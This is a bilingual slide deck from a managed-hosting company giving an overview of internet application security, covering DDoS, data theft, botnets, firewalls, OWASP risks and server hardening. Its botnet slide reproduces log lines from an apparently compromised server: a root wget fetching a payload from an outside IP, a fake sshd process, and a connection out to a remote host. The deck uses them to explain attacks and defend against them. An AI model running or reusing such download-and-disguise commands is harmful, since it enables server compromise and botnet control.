internet system security overview

Internet Application SecuritySecuring Your System让应用的安全加固您的系统

By Steve MusheroApril, 2015

Build & Manage Servers Optimize & Manage Servers Manage Cloud Servers Copyright © 2015 ChinaNetCloud

Running the World’s Internet Servers www.ChinaNetCloud.com

Big Exciting Internet令人激动的互联网

1994

1996

1998

2000

2002

2004

2006

2008

2010

2012

2014

*

0

500

1,000

1,500

2,000

2,500

3,000

3,500

Internet Users (in millions)

Source: Internet Live StatsNote: * estimate for July 1, 2014. Growth in percentages

80%76%

73%

56%49%

47%


Use every day for everything每一天，时刻陪伴


For Every Part of Life 融入生活的每一部分


But not everything is happy但，不是诸事如意


Today’s Three Security Problems当今三大安全问题

• DDoS• Steal Data数据盗窃• Botnets僵尸网络


Security Problem #1 – DDoS 第一安全问题－ DDoS

• For Fun 捣蛋• Get Money 赚钱• Competitors 竞争


Security Problem #2 – Stealing Data第二安全问题－数据盗窃 • Steal Money

偷钱• Steal/Sell Data

偷数据• Steal Code

偷代码


Security Problem #3 – BotNets第三安全问题－僵尸网络

• Break In 攻入• Install Root Kit 安装• Call home for control 呼叫 • Do evil 作恶

Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP

root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd

sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED)

http://61.147.103.146:999/IP

http://61.147.103.146:999/IP


Where is Operations & Security ?Duang – 运维和安全在哪里 ?


Our Job is to Serve & Protect我们的职责就是安全代维


Security is Secondary, Not Important安全是次要的

Features - 特点Performance - 性能Convenience - 便捷

Security安全


But becoming more important但逐渐重要

P2P Lending 金融

E-Commerce

SaaS

Features - 特点Performance - 性能Convenience - 便

捷

Security安全


How to be Secure ?如何安全加固


What is the most Secure Application?什么是最安全的应用


Lots of pieces很多方面

• Internet – 互联网

• Firewalls －防火墙

• Web/App Servers －服务器

• Database －数据库

• OS －操作系统

• Servers ／ Cloud －物理机／云


4 Security Zones4 大安全区域

Internet互联网

In Front ofYour

Application应用之上

InsideYour App

应用之内

UnderYour App应用之下


Zone: Internet互联网

Internet互联网

In Front ofYour

Application

InsideYour

Application UnderYour

Application


DDoS AttacksDDoS 攻击


DDoS Type 1 – Overload Bandwidth第一种类型－带宽超载


DDoS Type 2 – Overload Servers第二种类型－服务器超载


DDoS – Solutions防 DDoS 策略

• Cloud Filtering – Anquanbao 安全宝• CDN Support － CDN 支持• IDC Hardware － IDC 硬件

• Front of Application Blocking在应用之前阻断• Complex & Difficult - 复杂而困难

• In Application Mitigation在应用之内缓解• Caching - 缓存


Zone: In Front of Your Application应用之上

Internet

In Front ofYour

Application应用之上

InsideYour

Application UnderYour

Application


Zone: In Front of Your Application应用之上


Firewalls – Traditional防火墙 – 传统

• Required – Basic protection要求－基本的保护

• Basic filtering基本的过滤

• NAT inbound• ssh, monitoring

• NAT outbound• Backups, DNS, ntp, updates


WAF – Web App FirewallWAF – 网页应用防火墙

• Increasingly Required 上升的需求

• More Advanced 更加先进

• More Complex更加复杂

• Can break your Application会影响应用

• Hard to Manage难以管理

• Hard to Monitor难以监控

• Different Types 多种类型• Patterns vs. Heuristics

安全宝


WAF – Web App FirewallWAF – 网页应用防火墙

• Two key protections 两种主要的防护

• Protect Application Code 保护应用代码

• OWASP basics• SQL, XSS

• DDoS Filtering & Limiting 过滤和限制

• IP, agent, url, session


WAF – Web App Firewall - TypesWAF- 网页应用防火墙 - 类型

• Dedicated Hardware专有硬件设备• Palo Alto Networks

• Software / Virtual软件／虚拟服务• Anquanbao - 安全宝• Aliyun Cloud Shell - 云盾

• Software Module软件模块• modSecurity

安全宝


Zone: Inside Your Application在应用之内

Internet

InsideYour

Application在应用之内

UnderYour

Application

In Front ofYour

Application


Inside Your Application在应用之内

Main App Security Problem ?APP 主要应用安全的问题是什么？



Inside YOUR Application在你的应用里面



Your Code你的代码



怎么办 ?



Write secure code写安全的代码


Secure Code – Difficult & Frustrating安全代码 – 又难又麻烦


Code – OWASP Project Resources代码 – OWASP 项目资源

• Info - 介绍• Guides - 指引• Tools - 工具

http://owasp.org.cn


Code – OWASP Top 10代码－ 10 大应用程序风险

Key Points 要点• A1 – Injection• A2 – Auth & Session Mgmt• A3 – XSS • A7 – Function ACLs• A8 – CSRF• A9 – Insecure Components

http://owasp.org.cn


Inside Your Application – App Scanning在应用之内－ APP 扫描

• Best practice最佳实践

• Find new problems找到新问题• As you update

更新• Third parties

第三方

• New exploits新的改进


Zone: Under Your Application在应用之下

Internet

UnderYour

Application在应用之下

In Front ofYour

Application

InsideYour

Application


Under Your Application ?在应用之下

什么意思？


Under Your Application – Cloud & Servers在应用之下－云 & 物理服务器

• Services• Servers & OS• Cloud• Network

• 服务软件• 服务器和操作系统• 云• 网络


Cloud & Servers – Love & Respect Them在应用之下－需要被关注

• Often forgotten经常被遗忘

• Often use defaults经常采取默认设置

• Or random Google search或用谷歌搜索配置

• Source of great danger风险的发源地


Services – Web Servers服务－网页服务器

• Best practices最佳实践

• Lots of small issues许多细小问题• Running user - 用户运行

• File permissions - 文件许可

• Dangerous uploads - PHP inside JPEGs !危险的上传

• SSL – Heartbleed, etc.


Services – App Servers服务－ APP 服务器

• Best Practices最佳实践

• Delete example APPs删除样例

• Delete tools (Tomcat)删除工具

• Patch Software (Java!) 软件补丁


Services – Database Servers服务－数据库服务器

• Use Best Practices最佳实践

• Secure Configuration安全配置

• Limited User Permission限制用户许可

• Separate App & DBA User区分 APP 和 DBA 用户


Services – Database Servers服务－数据库服务器

• Separate User for each App 区分每个 APP 的用户

• Safe File Permissions 安全的文件许可

• Log SQL if possible 尽可能记录 SQL


Under Your Application – Server & OS应用之下－服务器 & 操作系统

• Hardened OS加固

• Iptables防火墙

• Run Users用户运行

• File permissions文件许可


Under Your Application – Server & OS应用之下－服务器 & 操作系统

• Logging日志

• Scanning (ClamAV)扫描

• Track activity轨迹追踪

• Automate自动

• System Updates系统升级


Under Your Application – Cloud应用之下－云

• Best Practices最佳实践

• Control Access 控制登录权限

• Can delete EVERYTHING会被意外删除


Under Your Application – Cloud应用之下－云

• Separate Backups备份隔离

• Out of Cloud在云之外

• MFA Delete on AWS• AWS 上删除 MFA


Under Your Application – Network应用之下－网络

• Generally okay, BUT

• VPC on Clouds – Separate 使用公共云上隔离的私有网络

• Consider Out-of-Band Link (DDoS)考虑带外数据链接


Under Your Application – Network应用之下－网络

• Firewalls – Front & Middle防火墙－前端 &中间

• Secure Configuration安全配置

• Separate test/dev network区分测试／开发


Backups as Security备份即安全

• Backups ARE part of Security

备份属于安全管理的范畴• If all else fails, use backups

若发生意外，使用备份

• Keep them Secure安全备份

• Avoid Theft & Tampering 防止盗窃或恶意企图• Read-Only is Best 最好采用只读


Security Monitoring安全监控


Audit is also Important审计也很重要

Deep Check to Find Problems 深入检查 , 发现问题


Summary总结

• Security is Critically Important 安全非常重要• Increasingly Important 并且，越来越重要• Getting Harder 但也，越来越难• But more Tools 但，实用工具越来越多• Details & Experts Help 注重细节，并且需要专家帮助！


How can ChinaNetCloud help ?云络怎么帮您？


We Manage All of this for you我们为你管理好一切

• Deep Experience 丰富经验• Experts at Every Level 全面专业• Part of Overall

Operations 是运维工作的一部分


Thank you!谢谢


Thanks from ChinaNetCloud来自云络的感谢

Pioneers in OaaS – Operations as a Service运维即服务的先锋团队

ChinaNetCloud [email protected]

www.ChinaNetCloud.com

Beijing Office:

北京办公室Lee World Business Building #305

57 Happiness Village Road, Chaoyang District

朝阳区幸福村中路 57号利世商务楼 305室Beijing, 100027 China

Silicon Valley Office:

硅谷办公室

California Avenue

Palo Alto, 94123 USA

Shanghai Headquarters:

上海办公室

X2 Space 1-601, 1238 Xietu Lu

Shanghai, 200032 China 斜土路 1238号 X2空间 1号楼 601室

T: +86-21-6422-1946 F: +86-21-6422-4911